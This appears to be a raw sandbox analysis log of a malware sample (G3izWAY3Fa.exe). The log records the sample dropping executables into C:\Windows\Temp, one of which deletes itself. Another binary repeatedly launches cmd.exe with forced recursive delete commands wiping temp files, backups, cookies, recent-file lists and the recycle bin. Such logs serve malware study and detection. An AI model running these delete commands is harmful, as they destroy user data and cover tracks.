              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe" Jump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe" Jump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe" Jump to behavior
              Source: C:\Windows\Temp\v5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nulJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Temp\v5.exeSection loaded: acgenral.dllJump to behavior
